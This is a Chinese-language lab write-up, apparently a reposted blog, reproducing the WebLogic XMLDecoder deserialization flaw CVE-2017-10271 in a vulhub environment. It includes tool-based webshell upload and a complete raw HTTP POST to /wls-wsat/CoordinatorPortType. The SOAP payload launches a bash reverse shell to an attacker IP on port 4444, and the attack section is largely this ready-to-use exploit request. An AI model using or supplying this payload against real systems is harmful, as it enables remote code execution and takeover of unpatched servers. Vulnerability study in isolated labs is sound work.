Weblogic XMLDecoder 反序列化漏洞（CVE-2017-10271） - 代码天地

Weblogic XMLDecoder 反序列化漏洞（CVE-2017-10271）

企业开发 2023-12-17 01:20:18 阅读次数: 0

Weblogic XMLDecoder 反序列化漏洞（CVE-2017-10271）

1.漏洞原理

Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。

漏洞涉及版本

10.3.6.0.0

12.1.3.0.0

12.2.1.1.0

12.2.1.2.0

2.环境搭建

在vulhub中使用docker拉取镜像，启动环境

docker-compose up -d

访问http://your-ip:7001/即可看到一个404页面，说明weblogic已成功启动

在这里插入图片描述

访问http://192.168.241.129:7001/wls-wsat/CoordinatorPortType呈现如下页面，表示存在漏洞

在这里插入图片描述

3.漏洞复现过程

1.使用工具检测

在这里插入图片描述

可以直接利用该工具进行命令执行和shell上传

在这里插入图片描述

在这里插入图片描述

上传成功出现如下界面

在这里插入图片描述

2.不使用工具

访问http://192.168.241.129:7001/wls-wsat/CoordinatorPortType

使用brupsuite抓包，

在这里插入图片描述

将get方式改为POST
将webshell替换上去

注意其中反弹shell的语句，需要进行编码，否则解析XML的时候将出现格式错误,

而且在请求头中要修改Content-Type的对应值为text/xml

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.241.129:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.241.128/4444 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

在这里插入图片描述

反弹shell如图：

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/huangyongkang666/article/details/125968858

【研究】weblogic漏洞系列XMLDecoder 反序列化漏洞（CVE-2017-10271）

Weblogic 小于10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞（CVE-2017-10271）

Weblogic XMLDecoder 反序列化漏洞（CVE-2017-10271）检测与利用复现

Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271）

Weblogic 小于 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞（CVE-2017-10271）

Weblogic XMLDecoder 反序列化漏洞（CVE-2017-10271）

weblogic反序列化漏洞(CVE-2017-10271)

记录WebLogic(CVE-2017-10271)反序列化漏洞找WEBSHELL地址

Weblogic XML Decoder反序列化漏洞（CVE-2017-10271）

weblogic漏洞汇总-XMLDecoder

浅谈Weblogic反序列化——XMLDecoder的绕过史

Weblogic XMLDecoder 反序列化漏洞原理与漏洞复现（基于vulhub，保姆级的详细教程）

Weblogic(CVE-2017-10271)漏洞复现

WebLogic（CVE-2017-10271）

Weblogic漏洞复现——XML Decoder（CVE-2017-10271）

xmldecoder漏洞

反序列化漏洞CVE-2017-10271复现

weblogic远程调试XMLDecoder RCE

各种反序列化（XStream/XMLDecoder）

IDEA debug漏洞第一篇(weblogic,cve-2017-10271)

weblogic反序列化漏洞 cve-2018-3245

java反序列化——XMLDecoder反序列化漏洞

weblogic----CVE-2017-10271漏洞复现

weblogic 反序列化漏洞 getshell

Weblogic 反序列化漏洞历史

weblogic反序列化漏洞

CVE-2018-2628漏洞 weblogic WLS反序列化漏洞学习笔记

【漏洞通告】Weblogic 反序列化远程代码执行高危漏洞 (CVE-2018-2628)

WebLogic反序列化漏洞CVE-2018-2628漏洞检测与利用

漏洞复现 - Weblogic 反序列化命令执行漏洞（CVE-2018-2628）

今日推荐

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

《2024 年一季度互联网投融资运行情况》研究报告

报告：Django 仍然是 74% 开发者的首选

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

周排行

记一下去大梅沙的准备（2018-05-26）

Spring 注解事务

基于HTTP协议的客户端缓存

阿里云rds 备份和还原

[PHP] 几个拖慢 PHP 程序/API 运行速度的点

python 代码风格------------PEP8规则

js控制json生成菜单——自制菜单（一）

将字符串: 'k:1|k1:2|k2:3|k3:4 ' ,处理成 python 字典: {'k':1, 'k1':2, ...}

微信小程序转支付宝小程序

Qt551.窗口滚动条

每日归档

更多

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)